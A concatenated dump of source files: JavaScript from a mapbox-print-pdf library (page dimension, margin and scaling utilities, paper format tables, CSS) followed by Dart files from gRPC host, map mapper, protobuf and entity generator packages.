var convMargins = margins.to(dimensions.unit());
return new Dimens(dimensions.width() - convMargins.left() - convMargins.right(),
dimensions.height() - convMargins.top() - convMargins.bottom(), dimensions.unit());
};
var _to = function (value, unitFrom, unitTo) {
if (unitFrom === unitTo) return value;
value = _toInches(value, unitFrom);
if (value === -1) return value;
if (unitTo === UNITS.Inches) return value;
if (unitTo === UNITS.Centimeters) return value * IN_TO_CM;
if (unitTo === UNITS.Millimeters) return value * IN_TO_MM;
if (unitTo === UNITS.Points) return value * IN_TO_PT;
if (unitTo === UNITS.Pixels) return value * IN_TO_PX;
console.error('Unrecognized unit: ' + unitTo);
return -1;
};
var constructor = function (width, height, unit) {
this.to = function (unitTo) {
return new Dimens(Dimens.to(width, unit, unitTo), Dimens.to(height, unit, unitTo), unitTo);
};
this.toString = function () {
return 'width: ' + width + unit + '; height: ' + height + unit + ';';
};
this.subtractMargin = function (margin) {
return Dimens.subtractMargin(this, margin);
};
this.add = function (toAdd) {
return _add(this, toAdd);
};
this.area = function () {
return width * height;
};
this.sum = function () {
return width + height;
};
this.width = function () {
return width;
};
this.height = function () {
return height;
};
this.unit = function () {
return unit;
};
};
constructor.isValidDimensionObject = _isValidDimensionObject;
constructor.toDimension = _toDimension;
constructor.toPdfDimension = _toPdfDimension;
constructor.subtractMargin = _subtractMargin;
constructor.to = _to;
constructor.add = _add;
constructor.isValidPdfDimensionObject = _isValidPdfDimensionObject;
return constructor;
})();
var Margin = (function () {
var _isValidMargin = function (margin) {
if (check.isNumber(margin) && margin >= 0) return true;
if (!check.isObject(margin)) return false;
if (!margin.hasOwnProperty('top') || !margin.hasOwnProperty('bottom') ||
!margin.hasOwnProperty('right') || !margin.hasOwnProperty('left')) return false;
if ((!check.isNumber(margin.top) || margin.top < 0) ||
(!check.isNumber(margin.bottom) || margin.bottom < 0) ||
(!check.isNumber(margin.left) || margin.left < 0) ||
(!check.isNumber(margin.right) || margin.right < 0)) return false;
return true;
};
var _createPDFMargin = function (margin, unit) {
if (!isValidPDFUnit(unit) || !_isValidMargin(margin)) return null;
if (check.isNumber(margin)) {
return new Margin({
top: margin,
left: margin,
right: margin,
bottom: margin
}, unit);
} else {
var marg = new Margin(margin, unit);
return marg;
}
};
var constructor = function (margins, unit) {
var right = margins.right;
var left = margins.left;
var top = margins.top;
var bottom = margins.bottom;
this.to = function (toUnit) {
return new Margin({
right: Dimens.to(right, unit, toUnit),
left: Dimens.to(left, unit, toUnit),
top: Dimens.to(top, unit, toUnit),
bottom: Dimens.to(bottom, unit, toUnit),
}, toUnit);
};
this.top = function () {
return top;
};
this.left = function () {
return left;
};
this.right = function () {
return right;
};
this.bottom = function () {
return bottom;
};
this.toArray = function () {
return [top, left, bottom, right];
};
};
constructor.createPDFMargin = _createPDFMargin;
return constructor;
})();
var Size = function (value, unit) {
this.to = function (toUnit) {
return new Size(Dimens.to(value, unit, toUnit), toUnit);
};
this.value = function () {
return value;
};
this.unit = function () {
return unit;
};
};
Size.from = function (obj, valueProp) {
valueProp = valueProp ? valueProp : 'value';
if (!obj.hasOwnProperty(valueProp) || !obj.hasOwnProperty('unit')) return null;
if (!check.isNumber(obj[valueProp]) || obj[valueProp] < 0 || UNITS.Enumerated.indexOf(obj.unit) == -1) return null;
return new Size(obj[valueProp], obj.unit);
};
module.exports = {
Dimens: Dimens,
Margin: Margin,
Size: Size,
UNITS: UNITS
};
<|start_filename|>js/format-config.js<|end_filename|>
var dimensions = require('./dimensions.js');
var Dimens = dimensions.Dimens;
var UNITS = dimensions.UNITS;
var FormatConfig = (function() {
var DEFAULT_FORMATS = {
'a0': new Dimens(2383.94, 3370.39, UNITS.Points),
'a1': new Dimens(1683.78, 2383.94, UNITS.Points),
'a2': new Dimens(1190.55, 1683.78, UNITS.Points),
'a3': new Dimens(841.89, 1190.55, UNITS.Points),
'a4': new Dimens(595.28, 841.89, UNITS.Points),
'a5': new Dimens(419.53, 595.28, UNITS.Points),
'a6': new Dimens(297.64, 419.53, UNITS.Points),
'a7': new Dimens(209.76, 297.64, UNITS.Points),
'a8': new Dimens(147.40, 209.76, UNITS.Points),
'a9': new Dimens(104.88, 147.40, UNITS.Points),
'a10': new Dimens(73.70, 104.88, UNITS.Points),
'b0': new Dimens(2834.65, 4008.19, UNITS.Points),
'b1': new Dimens(2004.09, 2834.65, UNITS.Points),
'b2': new Dimens(1417.32, 2004.09, UNITS.Points),
'b3': new Dimens(1000.63, 1417.32, UNITS.Points),
'b4': new Dimens(708.66, 1000.63, UNITS.Points),
'b5': new Dimens(498.90, 708.66, UNITS.Points),
'b6': new Dimens(354.33, 498.90, UNITS.Points),
'b7': new Dimens(249.45, 354.33, UNITS.Points),
'b8': new Dimens(175.75, 249.45, UNITS.Points),
'b9': new Dimens(124.72, 175.75, UNITS.Points),
'b10': new Dimens(87.87, 124.72, UNITS.Points),
'c0': new Dimens(2599.37, 3676.54, UNITS.Points),
'c1': new Dimens(1836.85, 2599.37, UNITS.Points),
'c2': new Dimens(1298.27, 1836.85, UNITS.Points),
'c3': new Dimens(918.43, 1298.27, UNITS.Points),
'c4': new Dimens(649.13, 918.43, UNITS.Points),
'c5': new Dimens(459.21, 649.13, UNITS.Points),
'c6': new Dimens(323.15, 459.21, UNITS.Points),
'c7': new Dimens(229.61, 323.15, UNITS.Points),
'c8': new Dimens(161.57, 229.61, UNITS.Points),
'c9': new Dimens(113.39, 161.57, UNITS.Points),
'c10': new Dimens(79.37, 113.39, UNITS.Points),
'dl': new Dimens(311.81, 623.62, UNITS.Points),
'letter': new Dimens(612, 792, UNITS.Points),
'government-letter': new Dimens(576, 756, UNITS.Points),
'legal': new Dimens(612, 1008, UNITS.Points),
'junior-legal': new Dimens(576, 360, UNITS.Points),
'ledger': new Dimens(1224, 792, UNITS.Points),
'tabloid': new Dimens(792, 1224, UNITS.Points),
'credit-card': new Dimens(153, 243, UNITS.Points)
};
var userFormats = {};
var _getFormats = function() {
var formatsCopy = {};
var format;
for (format in DEFAULT_FORMATS) {
if (DEFAULT_FORMATS.hasOwnProperty(format)) {
formatsCopy[format] = DEFAULT_FORMATS[format];
}
}
for (format in userFormats) {
if (userFormats.hasOwnProperty(format)) {
formatsCopy[format] = userFormats[format];
}
}
return formatsCopy;
};
var _isDefaultFormat = function(format) {
if (userFormats.hasOwnProperty(format)) return false;
return DEFAULT_FORMATS.hasOwnProperty(format);
};
var _formatExists = function(format) {
return userFormats.hasOwnProperty(format) || DEFAULT_FORMATS.hasOwnProperty(format);
};
var _addFormat = function(format, dimension) {
if (userFormats.hasOwnProperty(format)) return {
error: 'Format ' + format + ' already exists'
};
if (!Dimens.isValidPdfDimensionObject(dimension)) return {
error: 'Dimensions are of an invalid type'
};
userFormats[format] = Dimens.toPdfDimension(dimension);
return {
success: true
};
};
var _getFormat = function(format) {
if (userFormats.hasOwnProperty(format)) return userFormats[format];
if (DEFAULT_FORMATS.hasOwnProperty(format)) return DEFAULT_FORMATS[format];
console.error('The format ' + format + ' doesn\'t exist.');
return null;
};
return {
getFormats: _getFormats,
isDefaultFormat: function(format) {
return _isDefaultFormat(format.toLowerCase());
},
addFormat: function(format, width, height, unit) {
return _addFormat(format.toLowerCase(), width, height, unit);
},
getFormat: function(format) {
return _getFormat(format.toLowerCase());
},
formatExists: function(format) {
return _formatExists(format.toLowerCase());
}
};
})();
module.exports = FormatConfig;
<|start_filename|>docs/css/index.css<|end_filename|>
html, body {
height: 100%;
}
#wrapper {
-webkit-transition: all 0.5s ease;
-moz-transition: all 0.5s ease;
-o-transition: all 0.5s ease;
transition: all 0.5s ease;
}
.fill-height {
min-height: 100%;
height: 100%;
}
.sidebar-wrapper {
overflow-y: auto;
background: #000;
-webkit-transition: all 0.5s ease;
-moz-transition: all 0.5s ease;
-o-transition: all 0.5s ease;
transition: all 0.5s ease;
}
#pdfViewer {
margin:0;
padding:0;
}
#map {
padding:0;
}
#pdfContainer {
padding:0;
overflow:hidden;
}
.progress-bar.animate {
width: 100%;
}
.sidebar-nav>.sidebar-brand {
height: 65px;
line-height: 60px;
text-align: center;
}
.sidebar-nav>.sidebar-brand a {
color: #999999;
}
label {
color: #999999;
}
.big-label {
font-size: 25px;
font-weight: bold;
}
.sidebar-nav>.sidebar-brand a:hover {
color: #fff;
background: none;
}
#printBtn {
float: right;
margin-bottom: 10px;
}
#resetBtn {
float:left;
margin-bottom: 10px;
}
<|start_filename|>js/scale-element.js<|end_filename|>
/*
* Mapbox Print Pdf - Printing PDFs with high resolution mapbox maps
* Copyright (c) 2018 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
var check = require('./type-check.js');
var Dimens = require('./dimensions.js').Dimens;
var SUPPORTED_UNITS = ['px', 'pt', 'rem', 'cm', 'mm', 'in', 'pc'];
var ATTR_SCALE_WIDTH = 'data-scale-width';
var ATTR_SCALE_HEIGHT = 'data-scale-height';
var ATTR_SCALE_SUM = 'data-scale-sum';
var ATTR_HANDLER = 'data-scale-handler';
var UNITS_REGEX = makePropertyRegex(SUPPORTED_UNITS);
function toSnakeCase(str) {
return str.replace(/([A-Z])/g, '-$1').toLowerCase();
}
function toCamelCase(str) {
return str.replace(/-([a-z])/g, function (match) {
return match[1].toUpperCase();
});
}
function makePropertyRegex(units) {
return new RegExp('^(\\d+\\.?\\d*)(' + units.join('|') + ')$');
}
var StyleSize = (function(supportedUnits) {
var _constructor = function(values) {
this.scale = function(percent) {
for (var i = 0; i < values.length; ++i) {
if (check.isString(values[i]) || supportedUnits.indexOf(values[i].unit) === -1) continue;
values[i].size *= percent;
}
return this;
};
this.toString = function() {
var string = '';
for (var i = 0; i < values.length; ++i) {
if (i > 0) string += ' ';
if (check.isString(values[i])) {
string += values[i];
continue;
}
string += values[i].size + values[i].unit;
}
return string;
};
};
var _fromString = function(string, regex) {
var styleValues = string.split(' ');
var values = [];
var atLeastOneMatch = false;
for (var i = 0; i < styleValues.length; ++i) {
var match = regex.exec(styleValues[i]);
if (!match || match.length != 3) {
values.push(styleValues[i]);
continue;
}
atLeastOneMatch = true;
values.push({
size: Number(match[1]),
unit: match[2]
});
}
if (!atLeastOneMatch) return null;
return new _constructor(values);
};
return {
fromString: _fromString
};
})(SUPPORTED_UNITS);
function getStyle(elem) {
if (elem.currentStyle) {
return {
style: elem.currentStyle,
snakeCase: false
};
// other browsers
} else if (elem.ownerDocument.defaultView &&
elem.ownerDocument.defaultView.getComputedStyle) {
return {
style: elem.ownerDocument.defaultView.getComputedStyle(elem),
snakeCase: true
};
} else {
return null;
}
}
function scaleSingleElement(element, percent, properties, newStyles) {
var style = getStyle(element);
if (style) {
for (var i = 0; i < properties.length; ++i) {
var prop = properties[i];
var propValue = style.snakeCase ? style.style.getPropertyValue(toSnakeCase(prop)) : style.style[prop];
var scaleValue = StyleSize.fromString(propValue, UNITS_REGEX);
if (scaleValue) newStyles.push({
elem: element,
prop: prop,
value: scaleValue.scale(percent).toString()
});
}
}
}
function scaleByAttribute(element, attr, percent, newStyles) {
if(element.hasAttribute(attr)) {
var properties = toCamelCase(element.getAttribute(attr)).split(' ');
scaleSingleElement(element, percent, properties, newStyles);
}
}
function recursiveScale(element, handlers, scalingObj, newStyles) {
if (element.hasAttribute(ATTR_HANDLER)) {
var handler = element.getAttribute(ATTR_HANDLER);
if (handlers.hasOwnProperty(handler) && check.isFunction(handlers[handler])) {
var tmpStyles = handlers[handler](element, scalingObj);
if (check.isArray(tmpStyles)) newStyles.push.apply(newStyles, tmpStyles);
}
} else {
scaleByAttribute(element, ATTR_SCALE_WIDTH, scalingObj.widthRatio, newStyles);
scaleByAttribute(element, ATTR_SCALE_HEIGHT, scalingObj.heightRatio, newStyles);
scaleByAttribute(element, ATTR_SCALE_SUM, scalingObj.sumRatio, newStyles);
}
for (var i = 0; i < element.children.length; ++i) {
recursiveScale(element.children[i], handlers, scalingObj, newStyles);
}
}
function applyStyles(newStyles) {
for (var i = 0; i < newStyles.length; ++i) {
var style = newStyles[i];
style.elem.style[style.prop] = style.value;
}
}
function scaleElement(element, handlers, orgDimens, currentDimens) {
if (!check.isHTMLElement(element) || !(orgDimens instanceof Dimens) || !(currentDimens instanceof Dimens)) return;
currentDimens = currentDimens.to(orgDimens.unit());
var scalingObj = {original: orgDimens, current: currentDimens};
scalingObj.heightRatio = currentDimens.height()/orgDimens.height();
scalingObj.widthRatio = currentDimens.width()/orgDimens.width();
scalingObj.sumRatio = (currentDimens.sum())/(orgDimens.sum());
var newStyles = [];
recursiveScale(element, handlers, scalingObj, newStyles);
applyStyles(newStyles);
}
module.exports = scaleElement;
| MateusLehmkuhl/mapbox-print-pdf |
<|start_filename|>grpc_host/lib/src/hosting/host.dart<|end_filename|>
import 'dart:io';
import 'dart:isolate';
import 'package:grpc_host/grpc_host.dart';
abstract class Host<TAppSettings> {
Settings<TAppSettings> get settings;
final void Function(HostParameters<TAppSettings> message) entryPoint;
Host(this.entryPoint);
Future serve() async {
var hostSettings = settings.hostSettings;
var receivePort = ReceivePort();
var errorReceivePort = ReceivePort();
var hostParameters = HostParameters<TAppSettings>(
receivePort.sendPort,
settings,
);
var isolates = <Isolate>[];
final numberIsolates =
hostSettings.isolatesMultiplier * Platform.numberOfProcessors +
hostSettings.extraIsolates;
for (var i = 0; i < numberIsolates; i++) {
var isolate = await Isolate.spawn(entryPoint, hostParameters,
errorsAreFatal: false);
isolate.addErrorListener(errorReceivePort.sendPort);
isolates.add(isolate);
}
receivePort.listen((msg) {
print(msg);
});
errorReceivePort.listen((msg) {
stderr.writeln('ERROR $msg');
});
}
}
<|start_filename|>grpc_host/lib/src/services/entity_services.dart<|end_filename|>
import 'package:grpc/grpc.dart';
import 'package:grpc_host/grpc_host.dart';
import 'package:nosql_repository/nosql_repository.dart';
import 'package:squarealfa_entity_adapter/squarealfa_entity_adapter.dart';
class EntityServices<TEntity> extends AuthenticatedServices {
final Repository<TEntity> repository;
final MapMapper<TEntity> mapMapper;
final EntityPermissions permissions;
final Validator validator;
EntityServices(ServiceCall call, EntityServicesParameters<TEntity> parameters)
: repository = parameters.repository,
validator = parameters.validator,
permissions = parameters.permissions,
mapMapper = parameters.mapMapper,
super(call);
Future<Stream<Map<String, dynamic>>> findToStream([
SearchCriteria criteria = const SearchCriteria(),
]) async {
final result = await repository.searchToStream(criteria, principal);
return result;
}
Future<Stream<TEntity>> findToEntityStream([
SearchCriteria criteria = const SearchCriteria(),
]) async {
final mapStream = await findToStream(criteria);
final entityStream = mapStream.map((m) => mapMapper.fromMap(m));
return entityStream;
}
Future<List<TEntity>> findToEntityList([
SearchCriteria criteria = const SearchCriteria(),
]) async {
final stream = await findToStream(criteria);
final list = stream.map((m) => mapMapper.fromMap(m)).toList();
return list;
}
Future<PagedSearchResult<TEntity>> findToEntityPage(
SearchCriteria criteria, {
TEntity Function(Map<String, dynamic> map)? mapper,
}) async {
final searchResult = await repository.searchWithCount(criteria, principal);
mapper ??= mapMapper.fromMap;
var page = await searchResult.page.map((m) => mapper!(m)).toList();
final ret = PagedSearchResult(
count: searchResult.count,
page: page,
);
return ret;
}
Future<PagedSearchResult<TPageItem>> findPage<TPageItem>(
SearchCriteria criteria, {
required TPageItem Function(Map<String, dynamic> map) mapper,
}) async {
final searchResult = await repository.searchWithCount(criteria, principal);
var page = await searchResult.page.map((m) {
final entity = mapper(m);
return entity;
}).toList();
final ret = PagedSearchResult(
count: searchResult.count,
page: page,
);
return ret;
}
}
<|start_filename|>grpc_host/lib/src/configuration/settings.dart<|end_filename|>
import 'package:grpc_host/grpc_host.dart';
class Settings<TAppSettings> {
final HostSettings hostSettings;
final TAppSettings? appSettings;
Settings(
this.hostSettings, {
this.appSettings,
});
}
<|start_filename|>map_mapper/test_mongo/test/map_mapper_generator_test.dart<|end_filename|>
import 'package:decimal/decimal.dart';
import 'package:map_mapper_generator_test/map_mapper_generator_test.dart';
import 'package:map_mapper_generator_test/src/person.dart';
import 'package:mongo_dart/mongo_dart.dart';
import 'package:test/test.dart';
void main() {
group('keyhandler tests', () {
test('mongo key handler', () {
final recipe = _scrambledEggsRecipe();
final mongoMap = recipe.toMap();
final mrecipe = mongoMap.toRecipe();
expect(mrecipe.key, recipe.key);
expect(mrecipe.categoryKey, recipe.categoryKey);
expect(mrecipe.category.id, recipe.category.id);
expect(mrecipe.category.mainComponentId, recipe.category.mainComponentId);
expect(mrecipe.ingredients.first.key, recipe.ingredients.first.key);
expect(mrecipe.ingredients.first.mainComponentKey,
recipe.ingredients.first.mainComponentKey);
expect(mongoMap['_id'], ObjectId.fromHexString(recipe.key));
expect(
mongoMap['categoryId'], ObjectId.fromHexString(recipe.categoryKey));
expect(mongoMap['category']['_id'],
ObjectId.fromHexString(recipe.category.id));
expect(mongoMap['category']['mainComponentId'],
ObjectId.fromHexString(recipe.category.mainComponentId));
expect(mongoMap['ingredients'][0]['_id'],
ObjectId.fromHexString(recipe.ingredients.first.key));
expect(mongoMap['ingredients'][0]['mainComponentId'],
ObjectId.fromHexString(recipe.ingredients.first.mainComponentKey));
});
test('mongo key handler for entity', () {
final key = ObjectId.fromSeconds(5653324265).toHexString();
final person = Person(key: key, name: 'Alice');
final mongoMap = person.toMap();
final mperson = mongoMap.toPerson();
expect(mperson.key, person.key);
expect(mongoMap['_id'], ObjectId.fromHexString(person.key));
});
});
}
Category _eggsCategory({
Component? alternativeComponent,
List<Component>? secondaryComponents,
}) =>
Category(
id: ObjectId.fromSeconds(4343433).toHexString(),
mainComponentId: ObjectId.fromSeconds(87633323).toHexString(),
title: 'eggs',
mainComponent: Component(
description: 'category component',
),
otherComponents: [
Component(description: 'other category component 1'),
Component(description: 'other category component 2'),
],
alternativeComponent: alternativeComponent,
secondaryComponents: secondaryComponents,
);
Recipe _scrambledEggsRecipe({
DateTime? expiryDate = null,
Duration? totalDuration = null,
bool? requiresRobot = null,
Component? alternativeComponent,
List<Component>? secondaryComponents,
Component? categoryAlternativeComponent,
List<Component>? categorySecondaryComponents,
ApplianceType? secondaryApplianceType,
List<String>? extraTags,
}) =>
Recipe(
category: _eggsCategory(
alternativeComponent: categoryAlternativeComponent,
secondaryComponents: categorySecondaryComponents,
),
key: ObjectId.fromSeconds(5653323465).toHexString(),
categoryKey: ObjectId.fromSeconds(576653323).toHexString(),
secondaryCategoryKey: ObjectId.fromSeconds(5653323465).toHexString(),
publishDate: DateTime(2021, 02, 05, 13, 15, 12),
expiryDate: expiryDate,
ingredients: [
Ingredient(
key: ObjectId.fromSeconds(73323465).toHexString(),
description: '',
quantity: Decimal.fromInt(0),
precision: 1202.067843212219876,
cookingDuration: Duration(),
mainComponentKey: ObjectId.fromSeconds(656434).toHexString(),
mainComponent: Component(
description: 'ingredient component',
),
otherComponents: [
Component(description: 'other ingredient component 1'),
Component(description: 'other ingredient component 2'),
],
alternativeComponent: alternativeComponent,
secondaryComponents: secondaryComponents,
),
],
title: 'Scrambled eggs',
preparationDuration: Duration(minutes: 23, seconds: 30),
totalDuration: totalDuration,
isPublished: true,
requiresRobot: requiresRobot,
mainApplianceType: ApplianceType.Cutlery,
secondaryApplianceType: secondaryApplianceType,
tags: ['tag1', 'tag2'],
extraTags: extraTags,
);
<|start_filename|>proto_mapper/test/lib/grpc/component.pb.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: component.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:core' as $core;
import 'package:protobuf/protobuf.dart' as $pb;
class GComponent extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GComponent',
createEmptyInstance: create)
..aOS(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'description')
..hasRequiredFields = false;
GComponent._() : super();
factory GComponent({
$core.String? description,
}) {
final _result = create();
if (description != null) {
_result.description = description;
}
return _result;
}
factory GComponent.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GComponent.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GComponent clone() => GComponent()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GComponent copyWith(void Function(GComponent) updates) =>
super.copyWith((message) => updates(message as GComponent))
as GComponent; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GComponent create() => GComponent._();
GComponent createEmptyInstance() => create();
static $pb.PbList<GComponent> createRepeated() => $pb.PbList<GComponent>();
@$core.pragma('dart2js:noInline')
static GComponent getDefault() => _defaultInstance ??=
$pb.GeneratedMessage.$_defaultFor<GComponent>(create);
static GComponent? _defaultInstance;
@$pb.TagNumber(1)
$core.String get description => $_getSZ(0);
@$pb.TagNumber(1)
set description($core.String v) {
$_setString(0, v);
}
@$pb.TagNumber(1)
$core.bool hasDescription() => $_has(0);
@$pb.TagNumber(1)
void clearDescription() => clearField(1);
}
class GListOfComponent extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GListOfComponent',
createEmptyInstance: create)
..pc<GComponent>(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'items',
$pb.PbFieldType.PM,
subBuilder: GComponent.create)
..hasRequiredFields = false;
GListOfComponent._() : super();
factory GListOfComponent({
$core.Iterable<GComponent>? items,
}) {
final _result = create();
if (items != null) {
_result.items.addAll(items);
}
return _result;
}
factory GListOfComponent.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GListOfComponent.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GListOfComponent clone() => GListOfComponent()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GListOfComponent copyWith(void Function(GListOfComponent) updates) =>
super.copyWith((message) => updates(message as GListOfComponent))
as GListOfComponent; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GListOfComponent create() => GListOfComponent._();
GListOfComponent createEmptyInstance() => create();
static $pb.PbList<GListOfComponent> createRepeated() =>
$pb.PbList<GListOfComponent>();
@$core.pragma('dart2js:noInline')
static GListOfComponent getDefault() => _defaultInstance ??=
$pb.GeneratedMessage.$_defaultFor<GListOfComponent>(create);
static GListOfComponent? _defaultInstance;
@$pb.TagNumber(1)
$core.List<GComponent> get items => $_getList(0);
}
<|start_filename|>entity/entity_generator/lib/src/copywith_generator/field_descriptor.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
class FieldDescriptor extends FieldDescriptorBase {
FieldDescriptor._(
FieldElement fieldElement,
) : super.fromFieldElement(fieldElement);
factory FieldDescriptor.fromFieldElement(
FieldElement fieldElement,
) {
return FieldDescriptor._(
fieldElement,
);
}
bool get typeHasEntityMapAnnotation {
var annotation = TypeChecker.fromRuntime(BuildBuilder)
.firstAnnotationOf(fieldElementType.element!);
return annotation != null;
}
bool get parameterTypeHasEntityMapAnnotation {
var annotation = TypeChecker.fromRuntime(BuildBuilder)
.firstAnnotationOf(parameterType.element!);
return annotation != null;
}
}
<|start_filename|>defaults_provider/test/lib/src/recipe.dart<|end_filename|>
import 'package:decimal/decimal.dart';
import 'package:defaults_provider_annotations/defaults_provider_annotations.dart';
import 'category.dart';
import 'ingredient.dart';
part 'recipe.g.dart';
@DefaultsProvider(createDefaultsProviderBaseClass: true)
class Recipe {
final String key;
final String title;
final List<Ingredient> ingredients;
final int numPosts;
final double doubleNumPosts;
final Decimal decimalNumPosts;
final String? runtimeTag;
final Ingredient mainIngredient;
final Category category;
Recipe({
this.key = '',
required this.title,
required this.ingredients,
this.runtimeTag,
required this.numPosts,
required this.doubleNumPosts,
required this.decimalNumPosts,
required this.mainIngredient,
required this.category,
});
}
class $RecipeDefaultsProvider extends $RecipeDefaultsProviderBase {
@override
Category get category => Category(title: 'my category');
}
<|start_filename|>entity_adapter/example/lib/grpc/asset.pbjson.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: asset.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields,deprecated_member_use_from_same_package
import 'dart:core' as $core;
import 'dart:convert' as $convert;
import 'dart:typed_data' as $typed_data;
@$core.Deprecated('Use gAssetDescriptor instead')
const GAsset$json = {
'1': 'GAsset',
'2': [
{'1': 'description', '3': 1, '4': 1, '5': 9, '10': 'description'},
{'1': 'value', '3': 2, '4': 1, '5': 9, '10': 'value'},
],
};
/// Descriptor for `GAsset`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gAssetDescriptor = $convert.base64Decode(
'CgZHQXNzZXQSIAoLZGVzY3JpcHRpb24YASABKAlSC2Rlc2NyaXB0aW9uEhQKBXZhbHVlGAIgASgJUgV2YWx1ZQ==');
@$core.Deprecated('Use gListOfAssetDescriptor instead')
const GListOfAsset$json = {
'1': 'GListOfAsset',
'2': [
{'1': 'items', '3': 1, '4': 3, '5': 11, '6': '.GAsset', '10': 'items'},
],
};
/// Descriptor for `GListOfAsset`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gListOfAssetDescriptor = $convert.base64Decode(
'CgxHTGlzdE9mQXNzZXQSHQoFaXRlbXMYASADKAsyBy5HQXNzZXRSBWl0ZW1z');
<|start_filename|>map_mapper/test_mongo/lib/src/entity.dart<|end_filename|>
abstract class Entity {
final String key;
Entity({
required this.key,
});
}
<|start_filename|>map_mapper/example/lib/src/recipe.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $RecipeMapMapper extends MapMapper<Recipe> {
const $RecipeMapMapper();
@override
Recipe fromMap(Map<String, dynamic> map) {
final $kh = const DefaultKeyHandler();
return Recipe(
key: $kh.keyFromMap(map, 'key'),
title: map['ptitle'] as String,
ingredients: List<Ingredient>.unmodifiable(map['ingredients']
.map((e) => const $IngredientMapMapper().fromMap(e))),
);
}
@override
Map<String, dynamic> toMap(Recipe instance) {
final $kh = const DefaultKeyHandler();
final map = <String, dynamic>{};
$kh.keyToMap(map, instance.key, 'key');
map['ptitle'] = instance.title;
map['ingredients'] = instance.ingredients
.map((e) => const $IngredientMapMapper().toMap(e))
.toList();
return map;
}
}
extension $RecipeMapExtension on Recipe {
Map<String, dynamic> toMap() => const $RecipeMapMapper().toMap(this);
static Recipe fromMap(Map<String, dynamic> map) =>
const $RecipeMapMapper().fromMap(map);
}
extension $MapRecipeExtension on Map<String, dynamic> {
Recipe toRecipe() => const $RecipeMapMapper().fromMap(this);
}
class $RecipeFieldNames {
final $kh = const DefaultKeyHandler();
final String fieldName;
final String prefix;
$RecipeFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $RecipeFieldNames()
: fieldName = '',
prefix = '';
static const _key = 'key';
String get key => prefix + $kh.fieldNameToMapKey(_key);
static const _title = 'title';
String get title => prefix + _title;
static const _ingredients = 'ingredients';
$IngredientFieldNames get ingredients =>
$IngredientFieldNames.sub(prefix + _ingredients);
@override
String toString() => fieldName;
}
<|start_filename|>map_mapper/test_mongo/lib/src/person.dart<|end_filename|>
import 'mongo_key_handler.dart';
import 'package:map_mapper_annotations/map_mapper_annotations.dart';
import 'entity.dart';
part 'person.g.dart';
@MapMap(useDefaultsProvider: true)
class Person extends Entity {
final String name;
Person({
required String key,
required this.name,
}) : super(key: key);
}
class $PersonDefaultsProvider {
String get key => '';
String get name => '';
}
<|start_filename|>firebase-auth-admin/bin/get_custom_claims_command.dart<|end_filename|>
import 'package:args/args.dart';
import 'command.dart';
import 'common_options.dart';
